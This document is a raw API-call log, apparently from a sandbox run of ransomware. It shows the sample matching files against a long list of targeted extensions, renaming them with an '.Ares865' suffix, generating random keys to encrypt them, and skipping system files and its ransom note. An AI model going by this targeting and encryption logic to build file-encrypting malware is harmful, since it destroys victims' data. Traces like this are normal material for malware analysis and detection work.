[0063.516] lstrlenW (lpString="jet") returned 3 [0063.516] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0063.516] lstrlenW (lpString="jtx") returned 3 [0063.516] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0063.516] lstrlenW (lpString="kdb") returned 3 [0063.516] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0063.516] lstrlenW (lpString="kexi") returned 4 [0063.516] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0063.516] lstrlenW (lpString="kexic") returned 5 [0063.516] lstrcmpiW (lpString1="s.jpg", lpString2="kexic") returned 1 [0063.517] lstrlenW (lpString="kexis") returned 5 [0063.517] lstrcmpiW (lpString1="s.jpg", lpString2="kexis") returned 1 [0063.517] lstrlenW (lpString="lgc") returned 3 [0063.517] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0063.517] lstrlenW (lpString="lwx") returned 3 [0063.517] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0063.517] lstrlenW (lpString="maf") returned 3 [0063.517] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0063.517] lstrlenW (lpString="maq") returned 3 [0063.517] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0063.517] lstrlenW (lpString="mar") returned 3 [0063.517] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0063.517] lstrlenW (lpString="marshal") returned 7 [0063.517] lstrcmpiW (lpString1="nts.jpg", lpString2="marshal") returned 1 [0063.517] lstrlenW (lpString="mas") returned 3 [0063.517] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0063.517] lstrlenW (lpString="mav") returned 3 [0063.517] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0063.517] lstrlenW (lpString="maw") returned 3 [0063.517] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0063.517] lstrlenW (lpString="mdbhtml") returned 7 [0063.517] lstrcmpiW (lpString1="nts.jpg", lpString2="mdbhtml") returned 1 [0063.517] lstrlenW (lpString="mdn") returned 3 [0063.517] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0063.517] lstrlenW (lpString="mdt") returned 3 [0063.517] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0063.517] lstrlenW (lpString="mfd") returned 3 [0063.517] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0063.517] lstrlenW (lpString="mpd") returned 3 [0063.517] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0063.517] lstrlenW (lpString="mrg") returned 3 [0063.517] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0063.517] lstrlenW (lpString="mud") returned 3 [0063.517] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0063.518] lstrlenW (lpString="mwb") returned 3 [0063.518] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0063.518] lstrlenW (lpString="myd") returned 3 [0063.518] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0063.518] lstrlenW (lpString="ndf") returned 3 [0063.518] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0063.518] lstrlenW (lpString="nnt") returned 3 [0063.518] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0063.518] lstrlenW (lpString="nrmlib") returned 6 [0063.518] lstrcmpiW (lpString1="ts.jpg", lpString2="nrmlib") returned 1 [0063.518] lstrlenW (lpString="ns2") returned 3 [0063.518] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0063.518] lstrlenW (lpString="ns3") returned 3 [0063.518] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0063.518] lstrlenW (lpString="ns4") returned 3 [0063.518] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0063.518] lstrlenW (lpString="nsf") returned 3 [0063.518] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0063.518] lstrlenW (lpString="nv") returned 2 [0063.518] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0063.518] lstrlenW (lpString="nv2") returned 3 [0063.518] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0063.518] lstrlenW (lpString="nwdb") returned 4 [0063.518] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0063.518] lstrlenW (lpString="nyf") returned 3 [0063.518] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0063.518] lstrlenW (lpString="odb") returned 3 [0063.518] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.518] lstrlenW (lpString="odb") returned 3 [0063.518] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.518] lstrlenW (lpString="oqy") returned 3 [0063.518] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0063.518] lstrlenW (lpString="ora") returned 3 [0063.518] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0063.518] lstrlenW (lpString="orx") returned 3 [0063.518] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0063.519] lstrlenW (lpString="owc") returned 3 [0063.519] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0063.519] lstrlenW (lpString="p96") returned 3 [0063.519] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0063.519] lstrlenW (lpString="p97") returned 3 [0063.519] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0063.519] lstrlenW (lpString="pan") returned 3 [0063.519] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0063.519] lstrlenW (lpString="pdb") returned 3 [0063.519] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0063.519] lstrlenW (lpString="pdm") returned 3 [0063.519] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0063.519] lstrlenW (lpString="pnz") returned 3 [0063.519] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0063.519] lstrlenW (lpString="qry") returned 3 [0063.519] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0063.519] lstrlenW (lpString="qvd") returned 3 [0063.519] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0063.519] lstrlenW (lpString="rbf") returned 3 [0063.519] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0063.519] lstrlenW (lpString="rctd") returned 4 [0063.519] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0063.519] lstrlenW (lpString="rod") returned 3 [0063.519] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0063.519] lstrlenW (lpString="rodx") returned 4 [0063.519] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0063.519] lstrlenW (lpString="rpd") returned 3 [0063.519] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0063.519] lstrlenW (lpString="rsd") returned 3 [0063.519] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0063.519] lstrlenW (lpString="sas7bdat") returned 8 [0063.519] lstrcmpiW (lpString1="ints.jpg", lpString2="sas7bdat") returned -1 [0063.519] lstrlenW (lpString="sbf") returned 3 [0063.519] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0063.519] lstrlenW (lpString="scx") returned 3 [0063.519] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0063.519] lstrlenW (lpString="sdb") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0063.520] lstrlenW (lpString="sdc") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0063.520] lstrlenW (lpString="sdf") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0063.520] lstrlenW (lpString="sis") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0063.520] lstrlenW (lpString="spq") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0063.520] lstrlenW (lpString="te") returned 2 [0063.520] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0063.520] lstrlenW (lpString="teacher") returned 7 [0063.520] lstrcmpiW (lpString1="nts.jpg", lpString2="teacher") returned -1 [0063.520] lstrlenW (lpString="tmd") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0063.520] lstrlenW (lpString="tps") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0063.520] lstrlenW (lpString="trc") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.520] lstrlenW (lpString="trc") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.520] lstrlenW (lpString="trm") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0063.520] lstrlenW (lpString="udb") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0063.520] lstrlenW (lpString="udl") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0063.520] lstrlenW (lpString="usr") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0063.520] lstrlenW (lpString="v12") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0063.520] lstrlenW (lpString="vis") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0063.520] lstrlenW (lpString="vpd") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0063.520] lstrlenW (lpString="vvv") returned 3 [0063.520] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0063.521] lstrlenW (lpString="wdb") returned 3 [0063.521] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0063.521] lstrlenW (lpString="wmdb") returned 4 [0063.521] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0063.521] lstrlenW (lpString="wrk") returned 3 [0063.521] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0063.521] lstrlenW (lpString="xdb") returned 3 [0063.521] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0063.521] lstrlenW (lpString="xld") returned 3 [0063.521] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0063.521] lstrlenW (lpString="xmlff") returned 5 [0063.521] lstrcmpiW (lpString1="s.jpg", lpString2="xmlff") returned -1 [0063.521] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.Ares865") returned 93 [0063.521] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\handprints.jpg"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\handprints.jpg.ares865"), dwFlags=0x1) returned 1 [0063.522] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\handprints.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.522] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4222) returned 1 [0063.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.522] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.523] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.523] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.523] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1380, lpName=0x0) returned 0x164 [0063.525] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1380) returned 0x190000 [0063.527] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.528] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.528] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.528] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.528] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.528] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.528] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.528] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.528] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.528] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0063.528] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.528] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0063.528] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.528] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.529] CloseHandle (hObject=0x164) returned 1 [0063.529] CloseHandle (hObject=0x154) returned 1 [0063.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.529] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a874760, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a874760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0063.529] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0063.529] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xce0e3b3c, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Orange Circles.htm", cAlternateFileName="ORANGE~1.HTM")) returned 1 [0063.529] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0063.529] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="aoldtz.exe") returned 1 [0063.529] lstrcmpiW (lpString1="Orange Circles.htm", lpString2=".") returned 1 [0063.529] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="..") returned 1 [0063.529] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="windows") returned -1 [0063.529] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="bootmgr") returned 1 [0063.529] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="temp") returned -1 [0063.529] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="pagefile.sys") returned -1 [0063.529] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="boot") returned 1 [0063.529] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="ids.txt") returned 1 [0063.529] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="ntuser.dat") returned 1 [0063.529] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="perflogs") returned -1 [0063.529] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="MSBuild") returned 1 [0063.529] lstrlenW (lpString="Orange Circles.htm") returned 18 [0063.529] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 85 [0063.529] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Orange Circles.htm" | out: lpString1="Orange Circles.htm") returned="Orange Circles.htm" [0063.529] lstrlenW (lpString="Orange Circles.htm") returned 18 [0063.529] lstrlenW (lpString="Ares865") returned 7 [0063.529] lstrcmpiW (lpString1="les.htm", lpString2="Ares865") returned 1 [0063.529] lstrlenW (lpString=".dll") returned 4 [0063.530] lstrcmpiW (lpString1="Orange Circles.htm", lpString2=".dll") returned 1 [0063.530] lstrlenW (lpString=".lnk") returned 4 [0063.530] lstrcmpiW (lpString1="Orange Circles.htm", lpString2=".lnk") returned 1 [0063.530] lstrlenW (lpString=".ini") returned 4 [0063.530] lstrcmpiW (lpString1="Orange Circles.htm", lpString2=".ini") returned 1 [0063.530] lstrlenW (lpString=".sys") returned 4 [0063.530] lstrcmpiW (lpString1="Orange Circles.htm", lpString2=".sys") returned 1 [0063.530] lstrlenW (lpString="Orange Circles.htm") returned 18 [0063.530] lstrlenW (lpString="bak") returned 3 [0063.530] lstrcmpiW (lpString1="htm", lpString2="bak") returned 1 [0063.530] lstrlenW (lpString="ba_") returned 3 [0063.530] lstrcmpiW (lpString1="htm", lpString2="ba_") returned 1 [0063.530] lstrlenW (lpString="dbb") returned 3 [0063.530] lstrcmpiW (lpString1="htm", lpString2="dbb") returned 1 [0063.530] lstrlenW (lpString="vmdk") returned 4 [0063.530] lstrcmpiW (lpString1=".htm", lpString2="vmdk") returned -1 [0063.530] lstrlenW (lpString="rar") returned 3 [0063.530] lstrcmpiW (lpString1="htm", lpString2="rar") returned -1 [0063.530] lstrlenW (lpString="zip") returned 3 [0063.530] lstrcmpiW (lpString1="htm", lpString2="zip") returned -1 [0063.530] lstrlenW (lpString="tgz") returned 3 [0063.530] lstrcmpiW (lpString1="htm", lpString2="tgz") returned -1 [0063.530] lstrlenW (lpString="vbox") returned 4 [0063.530] lstrcmpiW (lpString1=".htm", lpString2="vbox") returned -1 [0063.530] lstrlenW (lpString="vdi") returned 3 [0063.530] lstrcmpiW (lpString1="htm", lpString2="vdi") returned -1 [0063.530] lstrlenW (lpString="vhd") returned 3 [0063.530] lstrcmpiW (lpString1="htm", lpString2="vhd") returned -1 [0063.530] lstrlenW (lpString="vhdx") returned 4 [0063.530] lstrcmpiW (lpString1=".htm", lpString2="vhdx") returned -1 [0063.530] lstrlenW (lpString="avhd") returned 4 [0063.530] lstrcmpiW (lpString1=".htm", lpString2="avhd") returned -1 [0063.530] lstrlenW (lpString="db") returned 2 [0063.530] lstrcmpiW (lpString1="tm", lpString2="db") returned 1 [0063.530] lstrlenW (lpString="db2") returned 3 [0063.530] lstrcmpiW (lpString1="htm", lpString2="db2") returned 1 [0063.530] lstrlenW (lpString="db3") returned 3 [0063.531] lstrcmpiW (lpString1="htm", lpString2="db3") returned 1 [0063.531] lstrlenW (lpString="dbf") returned 3 [0063.531] lstrcmpiW (lpString1="htm", lpString2="dbf") returned 1 [0063.531] lstrlenW (lpString="mdf") returned 3 [0063.531] lstrcmpiW (lpString1="htm", lpString2="mdf") returned -1 [0063.531] lstrlenW (lpString="mdb") returned 3 [0063.531] lstrcmpiW (lpString1="htm", lpString2="mdb") returned -1 [0063.531] lstrlenW (lpString="sql") returned 3 [0063.531] lstrcmpiW (lpString1="htm", lpString2="sql") returned -1 [0063.531] lstrlenW (lpString="sqlite") returned 6 [0063.531] lstrcmpiW (lpString1="es.htm", lpString2="sqlite") returned -1 [0063.531] lstrlenW (lpString="sqlite3") returned 7 [0063.531] lstrcmpiW (lpString1="les.htm", lpString2="sqlite3") returned -1 [0063.531] lstrlenW (lpString="sqlitedb") returned 8 [0063.531] lstrcmpiW (lpString1="cles.htm", lpString2="sqlitedb") returned -1 [0063.531] lstrlenW (lpString="xml") returned 3 [0063.531] lstrcmpiW (lpString1="htm", lpString2="xml") returned -1 [0063.531] lstrlenW (lpString="$er") returned 3 [0063.531] lstrcmpiW (lpString1="htm", lpString2="$er") returned 1 [0063.531] lstrlenW (lpString="4dd") returned 3 [0063.531] lstrcmpiW (lpString1="htm", lpString2="4dd") returned 1 [0063.531] lstrlenW (lpString="4dl") returned 3 [0063.531] lstrcmpiW (lpString1="htm", lpString2="4dl") returned 1 [0063.531] lstrlenW (lpString="^^^") returned 3 [0063.531] lstrcmpiW (lpString1="htm", lpString2="^^^") returned 1 [0063.531] lstrlenW (lpString="abs") returned 3 [0063.531] lstrcmpiW (lpString1="htm", lpString2="abs") returned 1 [0063.531] lstrlenW (lpString="abx") returned 3 [0063.531] lstrcmpiW (lpString1="htm", lpString2="abx") returned 1 [0063.531] lstrlenW (lpString="accdb") returned 5 [0063.531] lstrcmpiW (lpString1="s.htm", lpString2="accdb") returned 1 [0063.531] lstrlenW (lpString="accdc") returned 5 [0063.531] lstrcmpiW (lpString1="s.htm", lpString2="accdc") returned 1 [0063.531] lstrlenW (lpString="accde") returned 5 [0063.531] lstrcmpiW (lpString1="s.htm", lpString2="accde") returned 1 [0063.531] lstrlenW (lpString="accdr") returned 5 [0063.531] lstrcmpiW (lpString1="s.htm", lpString2="accdr") returned 1 [0063.532] lstrlenW (lpString="accdt") returned 5 [0063.532] lstrcmpiW (lpString1="s.htm", lpString2="accdt") returned 1 [0063.532] lstrlenW (lpString="accdw") returned 5 [0063.532] lstrcmpiW (lpString1="s.htm", lpString2="accdw") returned 1 [0063.532] lstrlenW (lpString="accft") returned 5 [0063.532] lstrcmpiW (lpString1="s.htm", lpString2="accft") returned 1 [0063.532] lstrlenW (lpString="adb") returned 3 [0063.532] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.532] lstrlenW (lpString="adb") returned 3 [0063.532] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.532] lstrlenW (lpString="ade") returned 3 [0063.532] lstrcmpiW (lpString1="htm", lpString2="ade") returned 1 [0063.532] lstrlenW (lpString="adf") returned 3 [0063.532] lstrcmpiW (lpString1="htm", lpString2="adf") returned 1 [0063.532] lstrlenW (lpString="adn") returned 3 [0063.532] lstrcmpiW (lpString1="htm", lpString2="adn") returned 1 [0063.532] lstrlenW (lpString="adp") returned 3 [0063.532] lstrcmpiW (lpString1="htm", lpString2="adp") returned 1 [0063.532] lstrlenW (lpString="alf") returned 3 [0063.532] lstrcmpiW (lpString1="htm", lpString2="alf") returned 1 [0063.532] lstrlenW (lpString="ask") returned 3 [0063.532] lstrcmpiW (lpString1="htm", lpString2="ask") returned 1 [0063.532] lstrlenW (lpString="btr") returned 3 [0063.532] lstrcmpiW (lpString1="htm", lpString2="btr") returned 1 [0063.532] lstrlenW (lpString="cat") returned 3 [0063.532] lstrcmpiW (lpString1="htm", lpString2="cat") returned 1 [0063.532] lstrlenW (lpString="cdb") returned 3 [0063.532] lstrcmpiW (lpString1="htm", lpString2="cdb") returned 1 [0063.532] lstrlenW (lpString="ckp") returned 3 [0063.532] lstrcmpiW (lpString1="htm", lpString2="ckp") returned 1 [0063.532] lstrlenW (lpString="cma") returned 3 [0063.532] lstrcmpiW (lpString1="htm", lpString2="cma") returned 1 [0063.532] lstrlenW (lpString="cpd") returned 3 [0063.532] lstrcmpiW (lpString1="htm", lpString2="cpd") returned 1 [0063.532] lstrlenW (lpString="dacpac") returned 6 [0063.532] lstrcmpiW (lpString1="es.htm", lpString2="dacpac") returned 1 [0063.532] lstrlenW (lpString="dad") returned 3 [0063.533] lstrcmpiW (lpString1="htm", lpString2="dad") returned 1 [0063.533] lstrlenW (lpString="dadiagrams") returned 10 [0063.533] lstrcmpiW (lpString1="ircles.htm", lpString2="dadiagrams") returned 1 [0063.533] lstrlenW (lpString="daschema") returned 8 [0063.533] lstrcmpiW (lpString1="cles.htm", lpString2="daschema") returned -1 [0063.533] lstrlenW (lpString="db-journal") returned 10 [0063.533] lstrcmpiW (lpString1="ircles.htm", lpString2="db-journal") returned 1 [0063.533] lstrlenW (lpString="db-shm") returned 6 [0063.533] lstrcmpiW (lpString1="es.htm", lpString2="db-shm") returned 1 [0063.533] lstrlenW (lpString="db-wal") returned 6 [0063.533] lstrcmpiW (lpString1="es.htm", lpString2="db-wal") returned 1 [0063.533] lstrlenW (lpString="dbc") returned 3 [0063.533] lstrcmpiW (lpString1="htm", lpString2="dbc") returned 1 [0063.533] lstrlenW (lpString="dbs") returned 3 [0063.533] lstrcmpiW (lpString1="htm", lpString2="dbs") returned 1 [0063.533] lstrlenW (lpString="dbt") returned 3 [0063.533] lstrcmpiW (lpString1="htm", lpString2="dbt") returned 1 [0063.533] lstrlenW (lpString="dbv") returned 3 [0063.533] lstrcmpiW (lpString1="htm", lpString2="dbv") returned 1 [0063.533] lstrlenW (lpString="dbx") returned 3 [0063.533] lstrcmpiW (lpString1="htm", lpString2="dbx") returned 1 [0063.533] lstrlenW (lpString="dcb") returned 3 [0063.533] lstrcmpiW (lpString1="htm", lpString2="dcb") returned 1 [0063.533] lstrlenW (lpString="dct") returned 3 [0063.533] lstrcmpiW (lpString1="htm", lpString2="dct") returned 1 [0063.533] lstrlenW (lpString="dcx") returned 3 [0063.533] lstrcmpiW (lpString1="htm", lpString2="dcx") returned 1 [0063.533] lstrlenW (lpString="ddl") returned 3 [0063.533] lstrcmpiW (lpString1="htm", lpString2="ddl") returned 1 [0063.534] lstrlenW (lpString="dlis") returned 4 [0063.534] lstrcmpiW (lpString1=".htm", lpString2="dlis") returned -1 [0063.534] lstrlenW (lpString="dp1") returned 3 [0063.534] lstrcmpiW (lpString1="htm", lpString2="dp1") returned 1 [0063.534] lstrlenW (lpString="dqy") returned 3 [0063.534] lstrcmpiW (lpString1="htm", lpString2="dqy") returned 1 [0063.534] lstrlenW (lpString="dsk") returned 3 [0063.534] lstrcmpiW (lpString1="htm", lpString2="dsk") returned 1 [0063.534] lstrlenW (lpString="dsn") returned 3 [0063.534] lstrcmpiW (lpString1="htm", lpString2="dsn") returned 1 [0063.534] lstrlenW (lpString="dtsx") returned 4 [0063.534] lstrcmpiW (lpString1=".htm", lpString2="dtsx") returned -1 [0063.534] lstrlenW (lpString="dxl") returned 3 [0063.534] lstrcmpiW (lpString1="htm", lpString2="dxl") returned 1 [0063.534] lstrlenW (lpString="eco") returned 3 [0063.534] lstrcmpiW (lpString1="htm", lpString2="eco") returned 1 [0063.534] lstrlenW (lpString="ecx") returned 3 [0063.534] lstrcmpiW (lpString1="htm", lpString2="ecx") returned 1 [0063.534] lstrlenW (lpString="edb") returned 3 [0063.534] lstrcmpiW (lpString1="htm", lpString2="edb") returned 1 [0063.534] lstrlenW (lpString="epim") returned 4 [0063.534] lstrcmpiW (lpString1=".htm", lpString2="epim") returned -1 [0063.534] lstrlenW (lpString="fcd") returned 3 [0063.534] lstrcmpiW (lpString1="htm", lpString2="fcd") returned 1 [0063.534] lstrlenW (lpString="fdb") returned 3 [0063.534] lstrcmpiW (lpString1="htm", lpString2="fdb") returned 1 [0063.534] lstrlenW (lpString="fic") returned 3 [0063.534] lstrcmpiW (lpString1="htm", lpString2="fic") returned 1 [0063.534] lstrlenW (lpString="flexolibrary") returned 12 [0063.534] lstrcmpiW (lpString1=" Circles.htm", lpString2="flexolibrary") returned -1 [0063.534] lstrlenW (lpString="fm5") returned 3 [0063.534] lstrcmpiW (lpString1="htm", lpString2="fm5") returned 1 [0063.534] lstrlenW (lpString="fmp") returned 3 [0063.534] lstrcmpiW (lpString1="htm", lpString2="fmp") returned 1 [0063.534] lstrlenW (lpString="fmp12") returned 5 [0063.534] lstrcmpiW (lpString1="s.htm", lpString2="fmp12") returned 1 [0063.534] lstrlenW (lpString="fmpsl") returned 5 [0063.535] lstrcmpiW (lpString1="s.htm", lpString2="fmpsl") returned 1 [0063.535] lstrlenW 